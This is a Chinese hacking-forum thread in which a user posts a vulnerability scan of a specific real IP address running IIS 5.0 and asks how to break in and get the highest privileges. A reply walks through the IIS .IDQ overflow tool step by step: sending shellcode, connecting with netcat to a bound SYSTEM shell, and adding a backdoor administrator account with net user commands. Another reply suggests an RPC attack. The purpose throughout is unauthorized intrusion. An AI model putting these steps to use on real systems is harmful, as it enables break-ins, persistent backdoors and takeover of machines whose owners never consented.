论坛: 菜鸟乐园 标题: 大哥们,帮帮忙!关于cgi/asp漏洞 复制本贴地址    
作者: smx8796 [smx8796]    论坛用户   登录
我最近扫了一台主机名为KJSERVER的机子,存在诸多漏洞.我想请问各位大哥
我如何利用cgi/asp入侵.又如何获得它的最高权限?
谢谢

地主 发表时间: 10/02 12:59

回复: frefreeney [frefreeney]   论坛用户   登录
  通过net命令!~具体的!~

B1层 发表时间: 10/02 13:11

回复: smx8796 [smx8796]   论坛用户   登录
探测主机:220.170.15.16
检测 Port-> 220.170.15.16 端口 80 [http] 开放 ...OK
检测 Port-> 220.170.15.16 端口 139 [netbios-ssn] 开放 ...OK
检测 Port-> 220.170.15.16 端口 135 [epmap] 开放 ...OK
检测 Port-> 220.170.15.16 端口 443 [https] 开放 ...OK
服务检测 HTTP-> Microsoft-IIS/5.0
发现NULL.printer漏洞-> 220.170.15.16 IIS5.0 NULL.printer Exploit ...OK
发现CGI漏洞-> 220.170.15.16/*.ida (200)...OK
发现CGI漏洞-> 220.170.15.16/*.idq (200)...OK
发现CGI漏洞-> 220.170.15.16/?PageServices (200)...OK
发现CGI漏洞-> 220.170.15.16/null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full (200)...OK
发现CGI漏洞-> 220.170.15.16/?wp-cs-dump (200)...OK
发现CGI漏洞-> 220.170.15.16/?wp-html-rend (200)...OK
发现CGI漏洞-> 220.170.15.16/?wp-start-ver (200)...OK
发现CGI漏洞-> 220.170.15.16/?wp-stop-ver (200)...OK
发现CGI漏洞-> 220.170.15.16/?wp-uncheckout (200)...OK
发现CGI漏洞-> 220.170.15.16/?wp-usr-prop (200)...OK
发现CGI漏洞-> 220.170.15.16/?wp-ver-diff (200)...OK
发现CGI漏洞-> 220.170.15.16/?wp-verify-link (200)...OK
发现CGI漏洞-> 220.170.15.16/?wp-ver-info (200)...OK
发现CGI漏洞-> 220.170.15.16/abczxv.htw (200)...OK
发现CGI漏洞-> 220.170.15.16/blabla.idq (200)...OK
发现CGI漏洞-> 220.170.15.16/scripts/samples/search/author.idq (200)...OK
发现CGI漏洞-> 220.170.15.16/scripts/samples/search/filesize.idq (200)...OK
发现CGI漏洞-> 220.170.15.16/scripts/samples/search/filetime.idq (200)...OK
发现CGI漏洞-> 220.170.15.16/scripts/samples/search/qfullhit.htw (200)...OK
发现CGI漏洞-> 220.170.15.16/scripts/samples/search/qsumrhit.htw (200)...OK
发现CGI漏洞-> 220.170.15.16/scripts/samples/search/query.idq (200)...OK
发现CGI漏洞-> 220.170.15.16/scripts/samples/search/queryhit.idq (200)...OK
发现CGI漏洞-> 220.170.15.16/scripts/samples/search/simple.idq (200)...OK
发现CGI漏洞-> 220.170.15.16/null.htw (200)...OK
发现CGI漏洞-> 220.170.15.16/prxdocs/misc/prxrch.idq (200)...OK

B2层 发表时间: 10/02 13:18

回复: VerZent [verzent]   论坛用户   登录
发现NULL.printer漏洞-> 220.170.15.16 IIS5.0 NULL.printer Exploit ...OK
发现CGI漏洞-> 220.170.15.16/*.ida (200)...OK
发现CGI漏洞-> 220.170.15.16/*.idq (200)...OK

你在www.google.com
输入.IDQ入侵就有答案了

B3层 发表时间: 10/02 16:01

回复: VerZent [verzent]   论坛用户   登录
看    http://snake12.top263.net/IISOverflow/IISOverflow.htm   
一共有两个版本.一个是GUI版本.一个是命令行版本. 
这里我们来说CUI版本,反正都差不多了,关键是要多试 
首先我们要找到有.IDQ漏洞的机子,可以用流光扫一下 
运行软件 
在被攻击IP地址后面写上对方的IP.端口号一般不需要改动. 
左面选择操作系统类型.先选择IIS5 English Win2k Sp0吧~ 
软件的默认绑定CMD.EXE的端口是813.不改了.用默认吧~~~ 
点击IDQ溢出~~OK~~出现发送Shellcode成功的提示了. 
接着我们用NC,你可以到到盟下载 WWW.CNHONKER.COM 
C:\>nc -vv XXX.XXX.XXX.XXX 813 
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA 
(UNKNOWN) [XXX.XXX.XXX.XXX] 813 (?) open 
Microsoft Windows 2000 [Version 5.00.2195] 
(C) Copyright 1985-2000 Microsoft Corp. 

C:\WINNT\system32> 

OK!!!上来了 
你现在有SYSTEM权限,不错吧,该做什么不用我教了吧,比如为自已留下个后门 
net user hacker password /add '添加一给名为hacker,密码为passwod的用户! 
net localgroup administrators hacker /add ' 把刚才创建的用户加入 Admnistrators组 
OK我们在来看看DOS版本 
下载软件后会有个运行文件,它太长了,将它必名为KAWEN 
D:\>KAWEN 
运行参数: 操作系统类型 目的地址 web端口 溢出端口 
支持的操作系统 类型: ---- 
0 -- IIS5中文Win2k Sp0 
1 -- IIS5中文Win2k Sp1 
2 -- IIS5中文Win2k Sp2 
3 -- IIS5 English Win2k Sp0 
4 -- IIS5 English Win2k Sp1 
5 -- --not support -- IIS5 English Win2k Sp2 
6 -- IIS5 Japanese Win2k Sp0 
7 -- IIS5 Japanese Win2k Sp1 
8 -- --not support -- IIS5 Japanese Win2k Sp2 

D:\>KAWEN 3 XXX.XXX.XXX.XXX80 456 
连接目的机器 XXX.XXX.XXX.XXX:80 OK. 
发送shellcode 到 XXX.XXX.XXX.XXX:80 OK 
现在,你可以 连接 该主机的 端口 456了,good luck.! 

开始吧 
D:\>nc -vv XXX.XXX.XXX.XXX 456 
mail.rycf.org [XXX.XXX.XXX.XXX] 456 (?): connection refused 
sent 0, rcvd 0: NOTSOCK 

没成功.试试sp1. 
D:\>KAWEN 4 XXX.XXX.XXX.XXX 80 888 
连接目的机器 XXX.XXX.XXX.XXX:80 OK. 
发送shellcode 到 XXX.XXX.XXX.XXX:80 OK 
现在,你可以 连接 该主机的 端口 888了,good luck.! 
D:\>nc -vv XXX.XXX.XXX.XXX 888 
XXX.XXX.XXX.XXX: inverse host lookup failed: h_errno 11004: NO_DATA 
(UNKNOWN) [XXX.XXX.XXX.XXX] 888 (?) open 
Microsoft Windows 2000 [Version 5.00.2195] 
(C) Copyright 1985-2000 Microsoft Corp. 

C:\WINNT\system32> 
看看我们又成功了 



B4层 发表时间: 10/02 16:03

回复: liujunyi [liujunyi]   论坛用户   登录
检测 Port-> 220.170.15.16 端口 139 [netbios-ssn] 开放 ...OK
检测 Port-> 220.170.15.16 端口 135 [epmap] 开放 ...OK

还有这个,,,看RPC能不能成功啊。


B5层 发表时间: 10/02 22:24

回复: smx8796 [smx8796]   论坛用户   登录
VerZent 给我的那个网站打不开啊。
你说的是用什么软件攻击啊

B6层 发表时间: 10/03 13:19

回复: smx8796 [smx8796]   论坛用户   登录
大哥大嫂们,可否指点一二啊!
当我好不容易发现一台肉鸡,而又不能对它施行入侵是很郁闷的一件是啊!
有高手请指点啊

B7层 发表时间: 10/03 19:50

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号